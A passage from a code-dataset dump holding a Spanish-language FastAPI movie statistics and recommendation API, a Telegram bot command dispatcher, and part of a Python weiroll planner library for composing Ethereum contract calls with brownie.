'Monday',\n 'martes': 'Tuesday',\n 'miércoles': 'Wednesday',\n 'jueves': 'Thursday',\n 'viernes': 'Friday',\n 'sábado': 'Saturday',\n 'domingo': 
#Endpoint 1\nclass Mes(str, Enum):\n    enero = \"enero\"\n    febrero = \"febrero\"\n    marzo = \"marzo\"\n    abril = \"abril\"\n    mayo = \"mayo\"\n    junio = \"junio\"\n    julio = \"julio\"\n    agosto = \"agosto\"\n    septiembre = \"septiembre\"\n    octubre = \"octubre\"\n    noviembre = \"noviembre\"\n    diciembre = \"diciembre\"\n\nmeses = {\n    \"enero\": 1,\n    \"febrero\": 2,\n    \"marzo\": 3,\n    \"abril\": 4,\n    \"mayo\": 5,\n    \"junio\": 6,\n    \"julio\": 7,\n    \"agosto\": 8,\n    \"septiembre\": 9,\n    \"octubre\": 10,\n    \"noviembre\": 11,\n    \"diciembre\": 12\n}\n\n@app.get(\"/peliculas/get_month/{mes}\", tags=['Peliculas'])\nasync def cantidad_filmaciones_mes( mes: Mes ):\n    \"\"\"\n    Number of films released in the given month.\n\n    Receives a month name in Spanish and returns the number of movies released in that month, regardless of the year.\n\n    Parameters\n    ----------\n    mes : str\n\n        month name in Spanish: enero, febrero, marzo, ...\n\n    Returns\n    -------\n    JSON:\n\n        {\"mes\":mes, \"peliculas\": int(salida) }\n    \n    Example\n    --------\n    >>> cantidad_filmaciones_mes(enero)\n\n    { \"mes\": \"enero\", \"peliculas\": 5909 }\n    \"\"\"\n    mesNum = meses[mes]\n    salida = df[df['release_date'].dt.month == mesNum].release_date.count()\n    return {\"mes\":mes, \"peliculas\": int(salida) }\n\n#Endpoint 2\nclass Dia(str, Enum):\n    lunes = 'lunes'\n    martes = 'martes'\n    miercoles = 'miércoles'\n    jueves = 'jueves'\n    viernes = 'viernes'\n    sabado = 'sábado'\n    domingo = 'domingo'\n\ndias = {\n    'lunes': 'Monday',\n    'martes': 'Tuesday',\n    'miércoles': 'Wednesday',\n    'jueves': 'Thursday',\n    'viernes': 'Friday',\n    'sábado': 'Saturday',\n    'domingo': 'Sunday'\n}\n\n@app.get(\"/peliculas/get_day/{dia}\", tags=['Peliculas'])\nasync def cantidad_filmaciones_dia( dia: Dia ):\n    \"\"\"\n    Number of films released on the given weekday, across all months.\n\n    Receives a weekday name in Spanish and returns the number of movies released on that day, regardless of month or year.\n\n    Parameters\n    ----------\n    dia : str\n\n        weekday in Spanish: lunes, martes, miércoles, jueves, viernes, sábado, domingo\n\n    Returns\n    -------\n    JSON\n\n        {\"dia\":dia, \"peliculas\": int(salida) }\n\n    Example\n    --------\n    >>> cantidad_filmaciones_dia(lunes)\n    { \"dia\": \"lunes\", \"peliculas\": 3500 }\n    \"\"\"\n    df['dia'] = df['release_date'].apply(lambda x: x.strftime('%A'))\n    salida = df[df['dia'] == dias[dia]].dia.count()\n    \n    return {\"dia\":dia, \"peliculas\": int(salida) }\n\n#Endpoint 3\n@app.get(\"/pelicula/get_popularidad/{titulo}\", tags=['Pelicula'])\nasync def score_titulo( titulo: str ):\n    \"\"\"\n    Popularity score of the film with the given title.\n\n    Receives a movie title in English and returns the title, the release year and the associated score rounded to 2 decimals.\n\n    Parameters\n    ----------\n    titulo : str\n\n        title in English\n\n    Returns\n    -------\n    JSON:\n\n        {'titulo':titulo, 'año_lanzamiento': release_year, 'popularidad':popularity}\n\n    Examples\n    --------\n    >>> score_titulo('Father of the Bride Part II') {success case} \\t\n    >>> {'titulo':'Father of the Bride Part II', 'año_lanzamiento': 1995, 'popularidad':8.39}\n\n    >>> score_titulo('Father of theBride') {error or not found} \\t\n    >>> {'titulo': 'Father of theBride', 'mensaje': 'Titulo no encontrado'}\n\n    \"\"\"\n    titulo = titulo.title()\n    coincidencias = df[df['title'] == titulo] \n\n    if not(coincidencias.empty):\n        salida_df = coincidencias[['title', 'release_year', 'popularity']].iloc[0]\n        salida_json = {'titulo':titulo, 'año_lanzamiento': int( salida_df['release_year']), 'popularidad': round(salida_df['popularity'], 2) } \n    else:\n        salida_json = {'titulo': titulo, 'mensaje': 'Titulo no encontrado'}\n\n    return salida_json\n\n#Endpoint 4\n@app.get(\"/pelicula/get_votos/{titulo}\", tags=['Pelicula'])\nasync def votos_titulo( titulo: str ):\n    \"\"\"\n    Vote count and average rating of the film with the given title, provided it has at least 2000 ratings.\n    Otherwise, no value is returned.\n\n    Receives a movie title in English and returns the title, release year, vote count and average rating.\n\n    Parameters\n    ----------\n    titulo : str\n\n        title in English\n\n    Returns\n    -------\n    JSON record:\n\n        {'titulo':titulo, 'año_lanzamiento': release_year, 'conteo_votos': vote_count, 'votos_promedio':vote_average }\n    Example\n    --------\n    >>> votos_titulo('Jumanji') {success case} \\t\n    >>> {'titulo':'Jumanji', 'año_lanzamiento': 1995, 'conteo_votos': 2413, 'votos_promedio':6.9 } \n\n    >>> votos_titulo('Father of the Bride Part II') {not found, or too few votes} \\t\n    >>> {'titulo': titulo, 'mensaje': 'No existe en el DataSet actual' }\n    >>> {'titulo': titulo, 'mensaje': 'No supera los 2000 votos minimos' }\n    \"\"\"\n    titulo = titulo.title()\n\n    coincidencias = df[df['title'] == titulo]\n\n    if not(coincidencias.empty):\n        salida_df = coincidencias[['title', 'release_year', 'vote_count', 'vote_average']].iloc[0] # keep the first match\n        if salida_df['vote_count'] >= 2000:\n            salida_json = 
{'titulo':titulo, 'año_lanzamiento': int( salida_df['release_year']), 'conteo_votos': int(salida_df['vote_count']), 'votos_promedio':round(salida_df['vote_average'], 2) } \n        else:\n            salida_json = {'titulo': titulo, 'mensaje': 'No supera los 2000 votos minimos' }\n    else:\n        salida_json = {'titulo': titulo, 'mensaje': 'No existe en el DataSet actual' }\n\n    return salida_json\n\n#Endpoint 5\n@app.get(\"/actor/get_actor/{actor}\", tags=['Actores'])\nasync def get_actor( actor: str ):\n    \"\"\"\n    Success of the given actor, measured through the return: number of films they appeared in and their average return.\n\n    Receives an actor's full name and returns the number of movies they appeared in, the total return and the average return.\n\n    Parameters\n    ----------\n    actor : str\n\n        Full name of the actor.\n\n    Returns\n    -------\n    JSON\n\n        {'actor':'Actor', 'cantidad_peliculas': film count, 'retorno_promedio': round(avg(retorno), 2) , 'retorno_total': round(sum(retorno), 2)}\n\n    Example\n    --------\n    >>> get_actor('Tom Hanks') {success case} \\t \n    >>> {'actor':'Tom Hanks', 'cantidad_peliculas': 71 , 'retorno_promedio': 2.52,'retorno_total': 3.96}\n\n    >>> get_actor('Pepe El grillo') {error, or not found} \\t\n    >>> {'actor':'Pepe El grillo', 'mensaje': 'Actor no encontrado'}\n    \"\"\" \n    actor = actor.title()\n    indices = []\n    for index, movie in df3.iterrows():\n        if actor in movie['cast']:\n            indices.append(index)\n\n    if len(indices) == 0:\n        salida_json = {'actor':actor, 'mensaje': 'Actor no encontrado'}\n    else:\n        coincidencias = df3.iloc[indices]\n        retorno_promedio = coincidencias['return'].mean()\n        retorno_total = coincidencias['return'].sum() # the total return was requested this way in the assignment queries\n        #retorno_total = coincidencias['revenue'].sum() / coincidencias['budget'].sum()\n        salida_json = {'actor':actor, 'cantidad_peliculas': len(indices), 'retorno_promedio': round(retorno_promedio, 2), 'retorno_total':round(retorno_total, 2)}\n    return salida_json \n\n#Endpoint 6\n@app.get(\"/director/get_director/{director}\", tags=['Directores'])\nasync def get_director(director: str):\n    \"\"\"\n    Success of the given director, measured through the return. 
Lists the directed films with each film's date, cost and individual revenue.\n\n    Receives a director's full name and returns the films they directed, with date, cost and individual revenue.\n\n    Parameters\n    ----------\n    director : str\n\n        full name of the director\n\n\n    Returns\n    ----------\n    JSON\n\n        { 'director':'director', 'retorno': round(retorno, 2), 'peliculas': [{pelicula1}, {pelicula2} ....]}.\n\n    Example\n    --------\n    >>> get_director('John Lasseter') {success case} \\t\n    >>> { \"director\": \"John Lasseter\", \"retorno\": 4.03,\n    \"peliculas\": [ { \"titulo\": \"Toy Story\", \"año_lanzamiento\": \"1995-10-30\", \"presupuesto\": 30000000, \"ganancia\": 373554033 },\n    { \"titulo\": \"A Bug'S Life\", \"año_lanzamiento\": \"1998-11-25\", \"presupuesto\": 120000000, \"ganancia\": 363258859 }, ...]\n\n    >>> get_director('Pepe el grillo') {not found} \\t\n    >>> { 'director':'Pepe el grillo', 'mensaje': 'Director no encontrado'}\n    \"\"\"\n    director = director.title()\n    indices = []\n    for index, movie in df3.iterrows():\n        if director in movie['director']:\n            indices.append(index)\n\n    if len(indices) > 0:\n        peliculas = df3.iloc[indices][['title', 'release_date', 'budget', 'revenue', 'return']]\n        retorno_total = peliculas['return'].sum() # --> as requested in the assignment queries\n        #retorno_total = peliculas['revenue'].sum() / peliculas['budget'].sum() \n        titulos = peliculas['title'].to_list()\n        fechas_estreno = peliculas['release_date'].dt.date.to_list()\n        presupuesto = peliculas['budget'].to_list()\n        ganancia = peliculas['revenue'].to_list()\n        \n        # LIST-BASED OUTPUT VERSION\n        #salida = { 'director':director, 'return': round(retorno_total, 2), 'titles': titulos, 'release_dates': fechas_estreno, 'budgets': presupuesto, 'revenues':ganancia}\n        pelis_json = [{'titulo': e1, 'año_lanzamiento': e2, 'presupuesto': e3, 'ganancia': e4} for e1, e2, e3,e4 in zip(titulos, fechas_estreno, presupuesto, ganancia)]\n        \n        salida = { 'director':director, 'retorno': round(retorno_total, 2), 'peliculas': pelis_json}\n    else:\n        salida = { 'director':director, 'mensaje': 'Director no encontrado'}\n    return salida\n\n# Recommendation system\n@app.get(\"/recomendacion/get_recomendacion/{titulo}\", tags=['Sistema de Recomendacion'])\nasync def get_recomendacion(titulo: str):\n    \"\"\" \n    Recommendation of the 5 movies most similar to the given title.\n    Receives a movie title in English and returns the names of the 5 most similar movies recommended by the system.\n\n    Parameters\n    ----------\n    titulo : str\n\n        Title of the movie, in English.\n\n    Returns\n    -------\n    JSON\n\n        { 'titulo': 'movie', 'titulos_recomendados': ['movie1', 'movie2', 'movie3', 'movie4', 'movie5'] }.\n\n    Example\n    --------\n    >>> get_recomendacion('Jumanji') {success case} \\t\n    >>> {\"titulo\":\"Jumanji\",\"titulos_recomendados\":[\"Existenz\",\"Dungeons & Dragons\",\"Any Given Sunday\",\"Manhunter\",\"A Monkey'S Tale\"]}\n\n    >>> get_recomendacion('Pepe el grillo') {not found} \\t\n    >>> {'title': 'Pepe El Grillo', 'mensaje': 'Titulo no encontrado'}\n    \n    \"\"\"\n    \n    titulo = titulo.title()\n    coincidencias = entrada_ml[entrada_ml['title'] == titulo]\n    if coincidencias.empty:\n        salida = {'title': titulo, 'mensaje': 'Titulo no encontrado'}\n    else:\n        indice = coincidencias.index[0]\n\n        recomendadas = obtener_recomendaciones(df = entrada_ml, matriz_sim = similitudes, indice_pelicula = indice,top_n = 5).tolist()\n\n        salida = {'titulo': titulo, 'titulos_recomendados': recomendadas}\n    return 
salida","repo_name":"ramirou2/ML_MovieRecomenderSystem","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":14632,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"51"} +{"seq_id":"9901242901","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- \n\n'''\n@Author: Xinshuo Gu \n@Date: 2018-02-22 18:00:24 \n@Last Modified by: Xinshuo Gu \n@Last Modified time: 2018-02-24 11:41:19 \n'''\n\n'''\nHere is the main function to dispatch all commands\nin Telegram\n'''\n\nfrom telegram.ext import Updater,CommandHandler\nimport telegram_cmd\nimport importlib\n\ndef main():\n # get the login token from bot father\n login_module = importlib.import_module('login_token')\n login_token = login_module.login_token\n \n updater = Updater(token =login_token)\n dispatcher = updater.dispatcher\n\n\n start_handler = CommandHandler('start',telegram_cmd.start)\n dispatcher.add_handler(start_handler)\n\n\n onplan_storing = CommandHandler('storing',telegram_cmd.storing)\n dispatcher.add_handler(onplan_storing)\n\n\n plan_storing = CommandHandler('planwork',telegram_cmd.planstoring)\n dispatcher.add_handler(plan_storing)\n\n\n print('Begin to run the server...')\n updater.start_polling()\n updater.idle()\n\n\nif __name__ == '__main__':\n main()","repo_name":"cricketku/NS-Telegram","sub_path":"telegram_main.py","file_name":"telegram_main.py","file_ext":"py","file_size_in_byte":1039,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"74781333277","text":"import re\nfrom collections import defaultdict, namedtuple\nfrom enum import IntEnum, IntFlag\nfrom functools import cache\nfrom typing import Optional\n\nimport brownie\nimport eth_abi\nimport eth_abi.packed\nfrom brownie.convert.utils import get_type_strings\nfrom brownie.network.contract import OverloadedMethod\nfrom hexbytes import HexBytes\n\nMAX_UINT256 = 2**256-1\n\n# TODO: real types?\nValue = namedtuple(\"Value\", \"param\")\nLiteralValue = namedtuple(\"LiteralValue\", \"param,value\")\nReturnValue = namedtuple(\"ReturnValue\", \"param,command\")\n\n\ndef simple_type_strings(inputs) -> tuple[Optional[list[str]], Optional[list[int]]]:\n \"\"\"cut state variables that are too long into 32 byte chunks.\n\n related: https://github.com/weiroll/weiroll.js/pull/34\n \"\"\"\n\n\n if not inputs:\n return None, None\n\n simple_inputs = []\n simple_sizes = []\n for i in inputs:\n if i.endswith(\"]\") and not i.endswith(\"[]\"):\n # fixed size array. 
cut it up\n            m = re.match(r\"([a-z0-9]+)\\[([0-9]+)\\]\", i)\n\n            size = int(m.group(2))\n\n            simple_inputs.extend([m.group(1)] * size)\n            simple_sizes.append(size)\n        elif i.startswith(\"(\") and i.endswith(\")\") and not isDynamicType(i):\n            types = i[1:-1].split(\",\")\n\n            simple_inputs.extend(types)\n            simple_sizes.append(len(types))\n        else:\n            simple_inputs.append(i)\n            simple_sizes.append(1)\n\n    if all([s == 1 for s in simple_sizes]):\n        # if no inputs or all the inputs are easily handled sizes, we don't need to simplify them\n        # we don't clear simple_inputs because it's simpler for that to just be a copy of self.inputs\n        simple_sizes = None\n\n    return simple_inputs, simple_sizes\n\n\ndef simple_args(simple_sizes, args):\n    \"\"\"split up complex types into 32 byte chunks that weiroll state can handle.\"\"\"\n    if not simple_sizes:\n        # no need to handle anything specially\n        return args\n\n    simplified = []\n    for i, size in enumerate(simple_sizes):\n        if size == 1:\n            # no need to do anything fancy\n            simplified.append(args[i])\n        else:\n            simplified.extend(args[i])\n\n    return simplified\n\n\n# TODO: not sure about this class. its mostly here because this is how the javascript sdk works. now that this works, i think we can start refactoring to use brownie more directly\nclass FunctionFragment:\n    def __init__(self, brownieContract: brownie.Contract, selector):\n        function_name = brownieContract.selectors[selector]\n\n        function = getattr(brownieContract, function_name)\n\n        if isinstance(function, OverloadedMethod):\n            overloaded_func = None\n            for m in function.methods.values():\n                # TODO: everyone is inconsistent about signature vs selector vs name\n                if m.signature == selector:\n                    overloaded_func = m\n                    break\n\n            assert overloaded_func\n            function = overloaded_func\n\n        self.function = function\n        self.name = function_name\n        self.signature = function.signature\n        self.inputs = get_type_strings(function.abi[\"inputs\"])\n\n        # look at the inputs that aren't dynamic types but also aren't 32 bytes long and cut them up\n        self.simple_inputs, self.simple_sizes = simple_type_strings(self.inputs)\n\n        self.outputs = get_type_strings(function.abi[\"outputs\"])\n        # TODO: do something to handle outputs of uncommon types?\n\n    def encode_args(self, *args):\n        if len(args) != len(self.inputs):\n            raise ValueError(f\"Function {self.name} has {len(self.inputs)} arguments but {len(args)} provided\")\n\n        # split up complex types into 32 byte chunks that weiroll state can handle\n        args = simple_args(self.simple_sizes, args)\n\n        return [encodeArg(arg, self.simple_inputs[i]) for (i, arg) in enumerate(args)]\n\n\nclass StateValue:\n    def __init__(self):\n        self.param = \"bytes[]\"\n\n\nclass SubplanValue:\n    def __init__(self, planner):\n        self.param = \"bytes[]\"\n        self.planner = planner\n\n\n# TODO: use python ABC or something like that?\ndef isValue(arg):\n    if isinstance(arg, Value):\n        return True\n    if isinstance(arg, LiteralValue):\n        return True\n    if isinstance(arg, ReturnValue):\n        return True\n    if isinstance(arg, StateValue):\n        return True\n    if isinstance(arg, SubplanValue):\n        return True\n    return False\n\n\n# TODO: this needs tests! I'm 90% sure this is wrong for lists\n# TODO: does eth_utils not already have this? 
it seems like other people should have written something like this\ndef hexConcat(*items) -> HexBytes:\n result = b\"\"\n for item in items:\n if isinstance(item, list):\n item = hexConcat(*item)\n else:\n item = HexBytes(item)\n result += bytes(item)\n return HexBytes(result)\n\n\nclass CommandFlags(IntFlag):\n # Specifies that a call should be made using the DELEGATECALL opcode\n DELEGATECALL = 0x00\n # Specifies that a call should be made using the CALL opcode\n CALL = 0x01\n # Specifies that a call should be made using the STATICCALL opcode\n STATICCALL = 0x02\n # Specifies that a call should be made using the CALL opcode, and that the first argument will be the value to send\n CALL_WITH_VALUE = 0x03\n # A bitmask that selects calltype flags\n CALLTYPE_MASK = 0x03\n # Specifies that this is an extended command, with an additional command word for indices. Internal use only.\n EXTENDED_COMMAND = 0x40\n # Specifies that the return value of this call should be wrapped in a `bytes`. Internal use only.\n TUPLE_RETURN = 0x80\n\n\nclass FunctionCall:\n def __init__(self, contract, flags: CommandFlags, fragment: FunctionFragment, args, callvalue=0):\n self.contract = contract\n self.flags = flags\n self.fragment = fragment\n self.args = args\n self.callvalue = callvalue\n\n def withValue(self, value):\n \"\"\"\n Returns a new [[FunctionCall]] that sends value with the call.\n @param value The value (in wei) to send with the call\n \"\"\"\n if (self.flags & CommandFlags.CALLTYPE_MASK) != CommandFlags.CALL and (\n self.flags & CommandFlags.CALLTYPE_MASK\n ) != CommandFlags.CALL_WITH_VALUE:\n raise ValueError(\"Only CALL operations can send value\")\n return self.__class__(\n self.contract,\n (self.flags & ~CommandFlags.CALLTYPE_MASK) | CommandFlags.CALL_WITH_VALUE,\n self.fragment,\n self.args,\n eth_abi.encode_single(\"uint\", value),\n )\n\n def rawValue(self):\n \"\"\"\n Returns a new [[FunctionCall]] whose return value will be wrapped as a `bytes`.\n This permits capturing the return values of functions with multiple return parameters,\n which weiroll does not otherwise support.\n \"\"\"\n return self.__class__(\n self.contract,\n self.flags | CommandFlags.TUPLE_RETURN,\n self.fragment,\n self.args,\n self.callvalue,\n )\n\n def staticcall(self):\n \"\"\"Returns a new [[FunctionCall]] that executes a STATICCALL instead of a regular CALL.\"\"\"\n if (self.flags & CommandFlags.CALLTYPE_MASK) != CommandFlags.CALL:\n raise ValueError(\"Only CALL operations can be made static\")\n return self.__class__(\n self.contract,\n (self.flags & ~CommandFlags.CALLTYPE_MASK) | CommandFlags.STATICCALL,\n self.fragment,\n self.args,\n self.callvalue,\n )\n\n\ndef isDynamicType(param) -> bool:\n return eth_abi.grammar.parse(param).is_dynamic\n\n\ndef encodeArg(arg, param):\n if isValue(arg):\n if arg.param != param:\n raise ValueError(f\"Cannot pass value of type ${arg.param} to input of type ${param}\")\n return arg\n if isinstance(arg, WeirollPlanner):\n return SubplanValue(arg)\n return LiteralValue(param, eth_abi.encode_single(param, arg))\n\n\nclass WeirollContract:\n \"\"\"\n * Provides a dynamically created interface to interact with Ethereum contracts via weiroll.\n *\n * Once created using the constructor or the [[Contract.createContract]] or [[Contract.createLibrary]]\n * functions, the returned object is automatically populated with methods that match those on the\n * supplied contract. 
For instance, if your contract has a method `add(uint, uint)`, you can call it on the\n * [[Contract]] object:\n * ```typescript\n * // Assumes `Math` is an ethers.js Contract instance.\n * const math = Contract.createLibrary(Math);\n * const result = math.add(1, 2);\n * ```\n *\n * Calling a contract function returns a [[FunctionCall]] object, which you can pass to [[Planner.add]],\n * [[Planner.addSubplan]], or [[Planner.replaceState]] to add to the sequence of calls to plan.\n \"\"\"\n\n def __init__(self, brownieContract: brownie.Contract, commandFlags: CommandFlags = 0):\n self.brownieContract = brownieContract\n self.address = brownieContract.address\n\n self.commandFlags = commandFlags\n self.functions = {} # aka functionsBySelector\n self.functionsBySignature = {}\n self.fragmentsBySelector = {}\n\n selectorsByName = defaultdict(list)\n\n for selector, name in self.brownieContract.selectors.items():\n fragment = FunctionFragment(self.brownieContract, selector)\n\n # Check that the signature is unique; if not the ABI generation has\n # not been cleaned or may be incorrectly generated\n if selector in self.functions:\n raise ValueError(f\"Duplicate ABI entry for selector: {selector}\")\n\n self.fragmentsBySelector[selector] = fragment\n\n plan_fn = buildCall(self, fragment)\n\n # save this plan helper function fragment in self.functions\n self.functions[selector] = plan_fn\n\n # make the plan helper function available on self by selector\n setattr(self, selector, plan_fn)\n\n # Track unique names; we only expose bare named functions if they are ambiguous\n selectorsByName[name].append(selector)\n\n self.functionsByUniqueName = {}\n\n for name, selectors in selectorsByName.items():\n # Ambiguous names to not get attached as bare names\n if len(selectors) == 1:\n if hasattr(self, name):\n # TODO: i think this is impossible\n raise ValueError(\"duplicate name!\")\n\n plan_fn = self.functions[selectors[0]]\n\n # make the plan helper function available on self\n setattr(self, name, plan_fn)\n self.functionsByUniqueName[name] = plan_fn\n else:\n # define a new function which will use brownie' get_fn_from_args\n # to decide which plan_fn to route to\n def _overload(*args, fn_name=name):\n overload_method = self.brownieContract.__getattribute__(fn_name)\n method = overload_method._get_fn_from_args(args)\n signature = method.signature\n plan_fn = self.functions[signature]\n return plan_fn(*args)\n\n setattr(self, name, _overload)\n\n # attach full signatures (for methods with duplicate names)\n for selector in selectors:\n fragment = self.fragmentsBySelector[selector]\n\n signature = name + \"(\" + \",\".join(fragment.inputs) + \")\"\n\n plan_fn = self.functions[selector]\n\n self.functionsBySignature[signature] = plan_fn\n\n\n @classmethod\n @cache\n def createContract(\n cls,\n contract: brownie.Contract,\n commandflags=CommandFlags.CALL,\n ):\n \"\"\"\n Creates a [[Contract]] object from an ethers.js contract.\n All calls on the returned object will default to being standard CALL operations.\n Use this when you want your weiroll script to call a standard external contract.\n @param contract The ethers.js Contract object to wrap.\n @param commandflags Optionally specifies a non-default call type to use, such as\n [[CommandFlags.STATICCALL]].\n \"\"\"\n assert commandflags != CommandFlags.DELEGATECALL\n return cls(\n contract,\n commandflags,\n )\n\n @classmethod\n @cache\n def createLibrary(\n cls,\n contract: brownie.Contract,\n ):\n \"\"\"\n * Creates a [[Contract]] object from an 
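The `fn_name=name` default argument in the overload dispatcher above is the standard fix for closure late binding: default values are captured at definition time, while a closure's free variables are resolved at call time. A minimal demonstration of the difference:

late, pinned = [], []
for name in ["add", "sub"]:
    late.append(lambda: name)        # every one of these sees the final `name`
    pinned.append(lambda n=name: n)  # each of these pins its own copy

assert [f() for f in late] == ["sub", "sub"]
assert [f() for f in pinned] == ["add", "sub"]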
ethers.js contract.\n * All calls on the returned object will default to being DELEGATECALL operations.\n * Use this when you want your weiroll script to call a library specifically designed\n * for use with weiroll.\n * @param contract The ethers.js Contract object to wrap.\n \"\"\"\n return cls(contract, CommandFlags.DELEGATECALL)\n\n # TODO: port getInterface?\n\n\n# TODO: not sure about this one. this was just how the javascript code worked, but can probably be refactored\ndef buildCall(contract: WeirollContract, fragment: FunctionFragment):\n def _call(*args) -> FunctionCall:\n if len(args) != len(fragment.inputs):\n raise ValueError(f\"Function {fragment.name} has {len(fragment.inputs)} arguments but {len(args)} provided\")\n\n # TODO: maybe this should just be fragment.encode_args()\n encodedArgs = fragment.encode_args(*args)\n\n return FunctionCall(\n contract,\n contract.commandFlags,\n fragment,\n encodedArgs,\n )\n\n return _call\n\n\nclass CommandType(IntEnum):\n CALL = 1\n RAWCALL = 2\n SUBPLAN = 3\n\n\nCommand = namedtuple(\"Command\", \"call,type\")\n\n\n# returnSlotMap: Maps from a command to the slot used for its return value\n# literalSlotMap: Maps from a literal to the slot used to store it\n# freeSlots: An array of unused state slots\n# stateExpirations: Maps from a command to the slots that expire when it's executed\n# commandVisibility: Maps from a command to the last command that consumes its output\n# state: The initial state array\nPlannerState = namedtuple(\n \"PlannerState\",\n \"returnSlotMap, literalSlotMap, freeSlots, stateExpirations, commandVisibility, state\",\n)\n\n\ndef padArray(a, length, padValue) -> list:\n return a + [padValue] * (length - len(a))\n\n\nclass WeirollPlanner:\n def __init__(self, clone):\n self.state = StateValue()\n self.commands: list[Command] = []\n self.unlimited_approvals = set()\n\n self.clone = clone\n\n def approve(self, token: brownie.Contract, spender: str, wei_needed, approve_wei=None) -> Optional[ReturnValue]:\n key = (token, self.clone, spender)\n\n if approve_wei is None:\n approve_wei = MAX_UINT256\n\n if key in self.unlimited_approvals and approve_wei != 0:\n # we already planned an infinite approval for this token (and we aren't trying to set the approval to 0)\n return\n\n # check current allowance\n if token.allowance(self.clone, spender) >= wei_needed:\n return\n\n if approve_wei == MAX_UINT256:\n self.unlimited_approvals.add(key)\n\n return self.call(token, \"approve\", spender, approve_wei)\n\n def call(self, brownieContract: brownie.Contract, func_name, *args):\n \"\"\"func_name can be just the name, or it can be the full signature.\n\n If there are multiple functions with the same name, you must use the signature.\n\n TODO: brownie has some logic for figuring out which overloaded method to use. 
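padArray above right-pads the argument-slot list out to the fixed command width; a quick check of the intended behavior (0xFF marks an unused slot):

def pad_array(a, length, pad_value) -> list:
    return a + [pad_value] * (length - len(a))

assert pad_array([1, 2], 6, 0xFF) == [1, 2, 255, 255, 255, 255]
# an already-full input comes back unchanged (a negative repeat count yields [])
assert pad_array([1] * 6, 6, 0xFF) == [1] * 6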
we should use that here\n \"\"\"\n weirollContract = WeirollContract.createContract(brownieContract)\n\n if func_name.endswith(\")\"):\n # TODO: would be interesting to look at args and do this automatically\n func = weirollContract.functionsBySignature[func_name]\n else:\n func = weirollContract.functionsByUniqueName[func_name]\n\n return self.add(func(*args))\n\n def delegatecall(self, brownieContract: brownie.Contract, func_name, *args):\n contract = WeirollContract.createLibrary(brownieContract)\n\n if func_name in contract.functionsByUniqueName:\n func = contract.functionsByUniqueName[func_name]\n elif func_name in contract.functionsBySignature:\n func = contract.functionsBySignature[func_name]\n else:\n # print(\"func_name:\", func_name)\n # print(\"functionsByUniqueName:\", contract.functionsByUniqueName)\n # print(\"functionsBySignature:\", contract.functionsBySignature)\n raise ValueError(f\"Unknown func_name ({func_name}) on {brownieContract}\")\n\n return self.add(func(*args))\n\n def add(self, call: FunctionCall) -> Optional[ReturnValue]:\n \"\"\"\n * Adds a new function call to the planner. Function calls are executed in the order they are added.\n *\n * If the function call has a return value, `add` returns an object representing that value, which you\n * can pass to subsequent function calls. For example:\n * ```typescript\n * const math = Contract.createLibrary(Math); // Assumes `Math` is an ethers.js contract object\n * const events = Contract.createLibrary(Events); // Assumes `Events` is an ethers.js contract object\n * const planner = new Planner();\n * const sum = planner.add(math.add(21, 21));\n * planner.add(events.logUint(sum));\n * ```\n * @param call The [[FunctionCall]] to add to the planner\n * @returns An object representing the return value of the call, or null if it does not return a value.\n \"\"\"\n command = Command(call, CommandType.CALL)\n self.commands.append(command)\n\n for arg in call.args:\n if isinstance(arg, SubplanValue):\n raise ValueError(\"Only subplans can have arguments of type SubplanValue\")\n\n if call.flags & CommandFlags.TUPLE_RETURN:\n return ReturnValue(\"bytes\", command)\n\n # TODO: test this more\n if len(call.fragment.outputs) != 1:\n return None\n\n # print(\"call fragment outputs\", call.fragment.outputs)\n\n return ReturnValue(call.fragment.outputs[0], command)\n\n def subcall(self, brownieContract: brownie.Contract, func_name, *args):\n \"\"\"\n * Adds a call to a subplan. This has the effect of instantiating a nested instance of the weiroll\n * interpreter, and is commonly used for functionality such as flashloans, control flow, or anywhere\n * else you may need to execute logic inside a callback.\n *\n * A [[FunctionCall]] passed to [[Planner.addSubplan]] must take another [[Planner]] object as one\n * argument, and a placeholder representing the planner state, accessible as [[Planner.state]], as\n * another. Exactly one of each argument must be provided.\n *\n * At runtime, the subplan is replaced by a list of commands for the subplanner (type `bytes32[]`),\n * and `planner.state` is replaced by the current state of the parent planner instance (type `bytes[]`).\n *\n * If the `call` returns a `bytes[]`, this will be used to replace the parent planner's state after\n * the call to the subplanner completes. 
Return values defined inside a subplan may be used outside that\n * subplan - both in the parent planner and in subsequent subplans - only if the `call` returns the\n * updated planner state.\n *\n * Example usage:\n * ```\n * const exchange = Contract.createLibrary(Exchange); // Assumes `Exchange` is an ethers.js contract\n * const events = Contract.createLibrary(Events); // Assumes `Events` is an ethers.js contract\n * const subplanner = new Planner();\n * const outqty = subplanner.add(exchange.swap(tokenb, tokena, qty));\n *\n * const planner = new Planner();\n * planner.addSubplan(exchange.flashswap(tokena, tokenb, qty, subplanner, planner.state));\n * planner.add(events.logUint(outqty)); // Only works if `exchange.flashswap` returns updated state\n * ```\n * @param call The [[FunctionCall]] to add to the planner.\n \"\"\"\n contract = WeirollContract.createContract(brownieContract)\n func = getattr(contract, func_name)\n func_call = func(*args)\n return self.addSubplan(func_call)\n\n def subdelegatecall(self, brownieContract: brownie.Contract, func_name, *args):\n contract = WeirollContract.createLibrary(brownieContract)\n func = getattr(contract, func_name)\n func_call = func(*args)\n return self.addSubplan(func_call)\n\n def addSubplan(self, call: FunctionCall):\n hasSubplan = False\n hasState = False\n\n for arg in call.args:\n if isinstance(arg, SubplanValue):\n if hasSubplan:\n raise ValueError(\"Subplans can only take one planner argument\")\n hasSubplan = True\n elif isinstance(arg, StateValue):\n if hasState:\n raise ValueError(\"Subplans can only take one state argument\")\n hasState = True\n if not hasSubplan or not hasState:\n raise ValueError(\"Subplans must take planner and state arguments\")\n if call.fragment.outputs and len(call.fragment.outputs) == 1 and call.fragment.outputs[0] != \"bytes[]\":\n raise ValueError(\"Subplans must return a bytes[] replacement state or nothing\")\n\n self.commands.append(Command(call, CommandType.SUBPLAN))\n\n def replaceState(self, call: FunctionCall):\n \"\"\"\n * Executes a [[FunctionCall]], and replaces the planner state with the value it\n * returns. This can be used to execute functions that make arbitrary changes to\n * the planner state. 
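addSubplan above insists on exactly one planner argument and exactly one state argument. The same validation in isolation, with predicate callables standing in for the isinstance checks (names here are illustrative):

def check_subplan_args(args, is_subplan, is_state):
    # exactly one subplan value and exactly one state value must be present
    has_subplan = has_state = False
    for arg in args:
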